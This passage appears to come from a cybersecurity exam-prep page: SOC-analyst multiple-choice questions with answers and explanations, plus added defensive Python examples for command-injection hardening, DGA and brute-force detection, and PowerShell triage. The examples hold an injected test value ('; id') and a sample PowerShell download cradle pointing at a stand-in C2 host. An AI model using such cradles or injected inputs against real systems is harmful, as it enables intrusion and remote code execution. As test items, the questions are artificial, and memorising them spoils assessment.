Session timeout management protects against session hijacking but does not address command injection risks.

D Add additional firewall rules at the network perimeter

Network-layer firewalls cannot effectively inspect application-layer inputs and therefore cannot prevent command injection attacks.
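The mitigation recommended in Questions 183, 188 and 193, shown as an added example of the vulnerable pattern beside its hardened form; this is not code from the original page. A ping-style host lookup is assumed as the feature, Linux iputils `ping` flags are assumed, and the vulnerable builder only returns the command string so the contrast can be inspected without running a shell.

```python
import ipaddress
import re
import subprocess

# Hostname syntax per RFC 1123 labels: 1-63 chars, alphanumerics and hyphens, no leading or
# trailing hyphen, whole name at most 253 chars. Rejecting a leading '-' also blocks argument
# injection (input that would be parsed as a ping option rather than a host).
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def vulnerable_ping_command(host):
    """'Before' form: unsanitized input is spliced into a command string that the vulnerable
    application then runs through a shell (subprocess.run(..., shell=True)). Returned as a
    string here so it can be inspected; this example never executes it."""
    return f"ping -c 1 {host}"


def validate_host(host):
    """Server-side validation: accept only an IP literal or a syntactically valid hostname."""
    if not isinstance(host, str) or not host:
        raise ValueError("host must be a non-empty string")
    try:
        ipaddress.ip_address(host)       # IPv4 or IPv6 literal
        return host
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"rejected host value: {host!r}")


def safe_ping_argv(host):
    """Hardened form: the validated value becomes exactly one argv element. With shell=False
    (the default) no shell parses the line, so metacharacters are never interpreted."""
    return ["ping", "-c", "1", validate_host(host)]


def ping(host, timeout=10):
    """Run the hardened command and return the CompletedProcess. Only a caller of this
    function touches the network; the tests exercise the argv construction alone."""
    return subprocess.run(safe_ping_argv(host), capture_output=True, text=True, timeout=timeout)


if __name__ == "__main__":
    print(vulnerable_ping_command("192.0.2.10; id"))   # metacharacters survive into the shell line
    print(safe_ping_argv("192.0.2.10"))
    try:
        safe_ping_argv("192.0.2.10; id")
    except ValueError as err:
        print("blocked:", err)
```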

Question 194

A SOC analyst observes obfuscated PowerShell scripts executing on endpoints and communicating with unknown external IPs. Antivirus scans detect no malicious files. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing campaigns with malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory, leveraging legitimate tools like PowerShell, WMI, or Office macros to execute malicious actions. Obfuscated scripts communicating with unknown external IPs without leaving files on disk are indicative of living-off-the-land malware. Traditional signature-based antivirus solutions often fail to detect these threats due to their memory-resident nature.

Detection relies on behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include abnormal script execution, high-volume or anomalous network communications, and deviations from baseline behavior. Mitigation involves isolating affected endpoints, terminating malicious processes, analyzing scripts for tactics, techniques, and procedures (TTPs), and remediating systems.

Preventive strategies include least privilege enforcement, application whitelisting, PowerShell logging, script block logging, execution policy enforcement, and integration of threat intelligence feeds. Defense-in-depth combining network segmentation, monitoring, anomaly detection, user awareness, and incident response planning is critical for effectively mitigating fileless malware.

B Standard ransomware encrypting files

Ransomware leaves file artifacts, which are absent in this scenario, making ransomware unlikely.

C Phishing campaigns with malicious attachments

Phishing requires user interaction and delivery of payloads, inconsistent with memory-resident obfuscated scripts.

D Distributed denial-of-service (DDoS) attack

DDoS targets resource availability, not stealthy, memory-resident malicious activity.

Question 195

A SOC analyst detects multiple failed login attempts from external IP addresses targeting privileged accounts. Attempts occur frequently and use predictable username patterns. Which of the following is the MOST likely threat?

A) Brute-force attack targeting credentials
B) Fileless malware executing in memory
C) Ransomware encrypting files
D) Spear-phishing targeting executives

Answer A

Explanation:

A Brute-force attack targeting credentials

The scenario describes a brute-force attack, where attackers systematically attempt multiple username-password combinations to gain unauthorized access. High-frequency attempts, predictable usernames, and external IP origins indicate automated tools or scripts rather than human error.

Brute-force attacks target weak or reused passwords, and compromised administrative accounts can allow attackers to escalate privileges, move laterally, deploy malware, or exfiltrate data. Distributed attacks originating from multiple IPs may evade per-IP detection or rate-limiting measures.

Detection involves analyzing authentication logs for failed attempts, geolocation anomalies, and unusual access times. SIEM and endpoint detection and response (EDR) solutions can correlate events across accounts and systems.

Mitigation includes implementing account lockout policies, enforcing strong passwords, requiring multi-factor authentication (MFA), rate-limiting login attempts, and integrating threat intelligence to block malicious IPs. Continuous monitoring and alerting enable rapid response to active attacks.

B Fileless malware executing in memory

Fileless malware does not typically manifest as repeated failed login attempts targeting multiple privileged accounts.

C Ransomware encrypting files

Ransomware focuses on encrypting data, not generating repeated login failures.

D Spear-phishing targeting executives

Spear-phishing relies on social engineering, not automated login attempts across multiple accounts.

Question 196

A SOC analyst notices that multiple endpoints are making frequent DNS requests to domains with high entropy and contacting external IP addresses over uncommon ports. Which of the following BEST describes this threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured network monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The observed network behavior strongly suggests that malware leveraging a domain generation algorithm (DGA) is maintaining command-and-control (C2) communications with external servers. High-entropy DNS queries indicate that domains are being generated pseudo-randomly, allowing malware to evade static blacklists and signature-based detection.

DGAs are a common tactic used by advanced persistent threats (APTs), ransomware operators, and botnets to maintain resilient and covert communication channels. These dynamically generated domains allow the malware to adapt if some C2 domains are blocked or taken offline. Outbound traffic over uncommon ports further strengthens the evidence of malware attempting to bypass traditional security measures.

Detection requires comprehensive monitoring, including DNS query logs, network traffic analysis, and endpoint behavior tracking. Machine learning can assist in identifying high-entropy domains and anomalous traffic patterns that deviate from baseline behavior. Endpoint detection and response (EDR) tools combined with threat intelligence feeds help identify indicators of compromise (IOCs) and predict potential future domains based on observed DGA logic.

Mitigation strategies include isolating infected endpoints, blocking detected domains and IP addresses, removing malware from systems, and conducting thorough forensic analysis. Reverse engineering the malware’s DGA component allows proactive blocking of predicted domains. Network segmentation, strict egress filtering, and behavior-based monitoring provide additional layers of defense to contain and prevent the spread of malware.
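
The entropy-based DNS check described above, as an added example (not code from the original page): it scores the second-level label of each queried name and groups results per client, so a host issuing many high-entropy names and NXDOMAIN answers stands out while a long but readable domain does not. The log lines are constructed and the thresholds are assumed.

```python
import math
from collections import Counter, defaultdict

# Constructed sample DNS query log: (client IP, queried name, response code).
# 10.0.1.15 shows the DGA pattern; 10.0.1.22 is normal traffic, including one
# long but human-readable domain that should not be flagged.
SAMPLE_DNS_LOG = [
    ("10.0.1.15", "www.microsoft.com", "NOERROR"),
    ("10.0.1.15", "xk3q9vz2m8p1wq.net", "NXDOMAIN"),
    ("10.0.1.15", "q7zr1bd0ksm3yt.com", "NXDOMAIN"),
    ("10.0.1.15", "v9n2lwpc4hxj7r.org", "NXDOMAIN"),
    ("10.0.1.15", "b3k8mzq1tyw6ne.info", "NOERROR"),
    ("10.0.1.22", "update.example.com", "NOERROR"),
    ("10.0.1.22", "www.constantcontact.com", "NOERROR"),
    ("10.0.1.22", "mail.google.com", "NOERROR"),
]


def shannon_entropy(s):
    """Shannon entropy of a string in bits per character."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def second_level_label(name):
    """Label left of the TLD (naive: no public-suffix list, so co.uk-style
    names would need a suffix library in production)."""
    parts = name.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def is_dga_like(name, entropy_threshold=3.2, min_len=10):
    """Assumed, tunable thresholds: long labels with a near-uniform character
    distribution look machine-generated; short or repetitive ones do not."""
    label = second_level_label(name)
    return len(label) >= min_len and shannon_entropy(label) >= entropy_threshold


def score_clients(log, min_dga_like=3):
    """Per client, count total queries, DGA-like names and NXDOMAIN answers;
    return the clients whose DGA-like count reaches min_dga_like."""
    stats = defaultdict(lambda: {"total": 0, "dga_like": 0, "nxdomain": 0})
    for client, name, rcode in log:
        st = stats[client]
        st["total"] += 1
        st["dga_like"] += is_dga_like(name)
        st["nxdomain"] += rcode == "NXDOMAIN"
    return {c: st for c, st in stats.items() if st["dga_like"] >= min_dga_like}


if __name__ == "__main__":
    for client, st in score_clients(SAMPLE_DNS_LOG).items():
        print(f"{client}: {st['dga_like']}/{st['total']} DGA-like, {st['nxdomain']} NXDOMAIN")
```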

B Routine software update traffic

Legitimate software updates communicate with known servers over standard ports. Randomized high-entropy domains and unusual outbound traffic patterns do not align with normal update behavior.

C Distributed denial-of-service (DDoS) attack

DDoS attacks focus on overwhelming network resources to degrade availability, rather than establishing covert C2 communications.

D Misconfigured network monitoring system

Misconfigurations can generate anomalous traffic, but rarely produce high-entropy DNS queries and outbound connections over non-standard ports simultaneously.

Question 197

An analyst identifies multiple privileged service accounts that have not been used for over a year. These accounts still retain administrative privileges, and no formal review process is in place. Which control MOST effectively mitigates this risk?

A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption across endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant privileged accounts present significant security risks as attackers can exploit them to gain unauthorized access, maintain persistence, and escalate privileges. Automated account deprovisioning ensures that accounts are disabled or removed after a defined period of inactivity, enforcing the principle of least privilege and minimizing the attack surface.

Integration with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement, auditability, and compliance with regulatory requirements such as PCI DSS, HIPAA, and SOX. Manual account deprovisioning is error-prone and may leave accounts active longer than necessary, increasing exposure to attacks. Automation reduces human error and ensures timely enforcement.

Complementary controls include implementing multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring of account activity. Logging attempts to access deprovisioned accounts provides visibility into potential insider threats or attempted compromises. Automated deprovisioning strengthens organizational security posture, reduces risk, and ensures compliance with established security policies.

B Increase password complexity for service accounts

While complex passwords reduce the risk of brute-force attacks, they do not address risks posed by inactive accounts that retain privileges.

C Disable all external SSH access

Restricting SSH access mitigates some external attack vectors but does not address risks associated with dormant internal privileged accounts.

D Deploy full disk encryption across endpoints

Encryption protects data at rest but does not mitigate the risk associated with inactive high-privilege accounts.

Question 198

During a penetration test, testers exploit a web application vulnerability that allows OS-level command execution via unsanitized input fields. Which control BEST mitigates this type of vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for web traffic
C) Increase session timeout values
D) Add additional firewall rules at the network perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection vulnerabilities arise when web applications improperly handle user input, allowing attackers to execute arbitrary OS commands. Server-side input validation ensures that all inputs conform to expected patterns, types, and lengths, preventing unexpected command execution. Parameterized commands or prepared statements separate user input from executable code, mitigating injection risks.

Secure coding practices, including input validation, output encoding, and adherence to development frameworks, reduce the likelihood of such vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) help identify vulnerabilities during development or pre-deployment. Web application firewalls (WAFs) can provide additional protection by blocking known malicious payloads and input patterns.

Continuous monitoring and logging of anomalous input attempts allow early detection of attack attempts. Remediation involves updating application code, training developers in secure coding, and conducting periodic penetration tests to verify the effectiveness of implemented controls. TLS encryption ensures confidentiality of data in transit but does not prevent command injection. Network firewalls cannot inspect application-layer inputs, making server-side validation with parameterized commands the most effective mitigation control.
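
Questions 193 and 198 both describe the same control, so one added example (not from the original page) covers both: a hostname-lookup helper written the vulnerable way, beside the hardened form that allowlist-validates on the server and passes an argument vector instead of a shell string. The `nslookup` wrapper and the hostname regex are assumptions for illustration.

```python
import re
import subprocess

# Allowlist for a DNS hostname: labels of 1-63 alphanumerics or hyphens, no
# leading or trailing hyphen, 253 chars total. A leading hyphen is rejected so
# the value can never be parsed as a command-line option either.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def vulnerable_lookup_command(host):
    """The vulnerable pattern, kept only for contrast and never executed here:
    user input is spliced into one string that subprocess.run(cmd, shell=True)
    hands to /bin/sh, so ';', '|', '&&' or '$(...)' in `host` become new commands."""
    return f"nslookup {host}"


def is_valid_hostname(host):
    """Server-side validation: accept only values matching the allowlist."""
    return bool(HOSTNAME_RE.match(host))


def validate_hostname(host):
    if not is_valid_hostname(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return host


def hardened_lookup_argv(host):
    """Hardened pattern: validate, then build an argument vector. With a list
    and shell=False (the default) the value is one argv entry, never parsed
    by a shell, so metacharacters have no special meaning."""
    return ["nslookup", validate_hostname(host)]


def run_lookup(host, runner=subprocess.run):
    """Run the hardened command; `runner` is injectable so tests need not
    have nslookup installed."""
    return runner(hardened_lookup_argv(host), capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    for candidate in ["example.com", "sub-domain.example.org", "example.com; id", "-V"]:
        try:
            print("accepted:", hardened_lookup_argv(candidate))
        except ValueError as exc:
            print("blocked: ", exc)
```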

B Enforce TLS encryption for web traffic

TLS secures communications but does not prevent malicious input from being executed on the server.

C Increase session timeout values

Session timeout policies help protect against session hijacking but do not mitigate command injection vulnerabilities.

D Add additional firewall rules at the network perimeter

Network-layer firewalls cannot inspect application-layer input effectively, making them insufficient to prevent command injection attacks.

Question 199

A SOC analyst observes obfuscated PowerShell scripts executing in memory on multiple endpoints, communicating with external IP addresses. Antivirus scans detect no files. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing campaigns with malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory, leveraging legitimate system tools such as PowerShell, Windows Management Instrumentation (WMI), or Office macros to execute malicious actions. Obfuscated scripts communicating with unknown external IPs without leaving files on disk are indicative of living-off-the-land malware. Signature-based antivirus solutions often fail to detect these threats because they reside entirely in memory.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators of compromise include abnormal script execution, high-volume or anomalous outbound communications, and deviations from baseline system behavior. Mitigation involves isolating affected endpoints, terminating malicious processes, analyzing scripts for tactics, techniques, and procedures (TTPs), and remediating the infected systems.

Preventive measures include enforcing least privilege, implementing application whitelisting, enabling PowerShell script block logging, enforcing execution policies, and integrating threat intelligence feeds to block malicious domains. A defense-in-depth approach, combining monitoring, anomaly detection, network segmentation, and incident response planning, is essential to mitigate fileless malware effectively.

Unlike ransomware, phishing, or DDoS, fileless malware avoids writing files to disk, making it stealthy and challenging to detect, necessitating advanced security controls and proactive monitoring.
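
Questions 194 and 199 both turn on the same indicators, so one added example (not from the original page) serves both: a scorer for PowerShell command lines taken from process-creation or script block logs that decodes an `-EncodedCommand` blob and weighs the visible switches together with the decoded payload. The sample command lines, the indicator list and the weights are constructed assumptions, not a vendor rule set.

```python
import base64
import re

# Constructed samples: a benign scheduled task and an obfuscated launcher whose
# payload is only visible after decoding the -EncodedCommand blob.
BENIGN_CMD = r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\ops\backup.ps1"
HIDDEN_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s')"
SUSPICIOUS_CMD = "powershell.exe -NoP -W Hidden -Exec Bypass -enc " + base64.b64encode(
    HIDDEN_PAYLOAD.encode("utf-16-le")).decode()

# powershell.exe accepts any unambiguous prefix of a parameter name, so match the short forms.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)

# (pattern, label, weight); weights are assumed, tune them against your own baseline.
INDICATORS = [
    (r"-(?:e|ec|enc|encodedcommand)\b", "encoded command", 3),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window", 2),
    (r"-(?:ep|exec|executionpolicy)\s+bypass", "execution policy bypass", 2),
    (r"\biex\b|invoke-expression", "Invoke-Expression", 3),
    (r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", "download cradle", 3),
    (r"\[char\]|-join\b|-replace\b|`", "string assembly / escaping", 1),
]


def decode_encoded_command(cmdline):
    """Plaintext of an -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmdline, threshold=5):
    """Score a command line (from event 4688 / Sysmon 1 or script block event 4104)
    on the visible switches plus the decoded payload, not on the opaque blob itself."""
    decoded = decode_encoded_command(cmdline)
    text = ENC_RE.sub("-EncodedCommand <blob>", cmdline)
    if decoded:
        text += "\n" + decoded
    hits = [(label, w) for pat, label, w in INDICATORS if re.search(pat, text, re.I)]
    score = sum(w for _, w in hits)
    return {
        "score": score,
        "indicators": [label for label, _ in hits],
        "decoded": decoded,
        "suspicious": score >= threshold,
    }
```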

B Standard ransomware encrypting files

Ransomware leaves artifacts on disk, which are not observed in this case.

C Phishing campaigns with malicious attachments

Phishing requires user interaction to deliver payloads, which is inconsistent with in-memory script execution.

D Distributed denial-of-service (DDoS) attack

DDoS targets service availability and does not involve stealthy in-memory script execution or outbound communications.

Question 200

A SOC analyst detects multiple failed login attempts from external IP addresses targeting administrative accounts. Attempts occur frequently and use predictable username patterns. Which of the following is the MOST likely threat?

A) Brute-force attack targeting credentials
B) Fileless malware executing in memory
C) Ransomware encrypting files
D) Spear-phishing targeting executives

Answer A

Explanation:

A Brute-force attack targeting credentials

This scenario describes a brute-force attack in which attackers systematically attempt multiple username-password combinations to gain unauthorized access. High-frequency attempts, predictable usernames, and external IP sources indicate automated attack tools rather than human error.

Brute-force attacks target weak or reused passwords, and compromised administrative accounts can allow attackers to escalate privileges, move laterally, deploy malware, exfiltrate data, or maintain persistence. Distributed attacks may use multiple IP addresses to evade rate-limiting controls.

Detection involves analyzing authentication logs for failed login attempts, geolocation anomalies, and unusual access patterns. Security information and event management (SIEM) and endpoint detection and response (EDR) systems can correlate events across multiple accounts to identify ongoing brute-force attacks.

Mitigation includes account lockout policies, enforcing strong passwords, requiring multi-factor authentication (MFA), rate-limiting login attempts, and integrating threat intelligence feeds to block malicious IP addresses. Continuous monitoring and alerting allow rapid response to active attacks, reducing risk of compromise.
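
Questions 195 and 200 describe the same detection, so one added example (not from the original page) covers both: it parses sshd-style failed-password lines and raises two alerts over a sliding window, one for a single source hammering predictable account names and one for an account hit from several sources, which a per-IP rate limit would not catch. The log lines, thresholds and username list are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

FAIL_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)
PREDICTABLE_RE = re.compile(r"^(?:root|admin|administrator|sysadmin|test|guest)\d*$", re.I)
# Constructed sample (TEST-NET addresses): 203.0.113.7 walks predictable admin
# names from one source; 198.51.100.21-22 hit root from additional sources.
SAMPLE_AUTH_LOG = """\
Jan 10 03:12:01 bastion sshd[2211]: Failed password for root from 203.0.113.7 port 51022 ssh2
Jan 10 03:12:03 bastion sshd[2213]: Failed password for admin from 203.0.113.7 port 51030 ssh2
Jan 10 03:12:04 bastion sshd[2215]: Failed password for invalid user admin1 from 203.0.113.7 port 51041 ssh2
Jan 10 03:12:06 bastion sshd[2217]: Failed password for invalid user admin2 from 203.0.113.7 port 51055 ssh2
Jan 10 03:12:07 bastion sshd[2219]: Failed password for administrator from 203.0.113.7 port 51060 ssh2
Jan 10 03:12:09 bastion sshd[2221]: Accepted publickey for deploy from 10.0.2.5 port 40122 ssh2
Jan 10 03:15:40 bastion sshd[2240]: Failed password for root from 198.51.100.21 port 33001 ssh2
Jan 10 03:15:41 bastion sshd[2242]: Failed password for root from 198.51.100.22 port 33002 ssh2
Jan 10 08:30:00 bastion sshd[3101]: Failed password for alice from 10.0.2.9 port 40200 ssh2
"""


def parse_failures(text, year=2024):
    """(timestamp, user, source ip) per failure line; syslog has no year, so one is assumed."""
    events = []
    for line in text.splitlines():
        m = FAIL_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["user"], m["ip"]))
    return events


def detect_bruteforce(events, window=timedelta(minutes=5), ip_threshold=5, spray_threshold=3):
    """Sliding-window detections (thresholds assumed; tune to your baseline): single-source,
    one IP with >= ip_threshold failures; distributed, one account from >= spray_threshold IPs."""
    by_ip, by_user = defaultdict(list), defaultdict(list)
    for ts, user, ip in sorted(events):
        by_ip[ip].append((ts, user))
        by_user[user].append((ts, ip))
    alerts = []
    for ip, hits in by_ip.items():
        for i, (start, _) in enumerate(hits):
            burst = [u for t, u in hits[i:] if t - start <= window]
            if len(burst) >= ip_threshold:
                guessed = sorted({u for u in burst if PREDICTABLE_RE.match(u)})
                alerts.append(("single-source", ip, len(burst), guessed))
                break
    for user, hits in by_user.items():
        for i, (start, _) in enumerate(hits):
            sources = sorted({s for t, s in hits[i:] if t - start <= window})
            if len(sources) >= spray_threshold:
                alerts.append(("distributed", user, len(sources), sources))
                break
    return alerts
```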

B Fileless malware executing in memory

Fileless malware does not typically manifest as repeated failed login attempts targeting multiple privileged accounts.

C Ransomware encrypting files

Ransomware focuses on encrypting data rather than repeated failed login attempts.

D Spear-phishing targeting executives

Spear-phishing relies on social engineering rather than automated login attempts across multiple accounts.
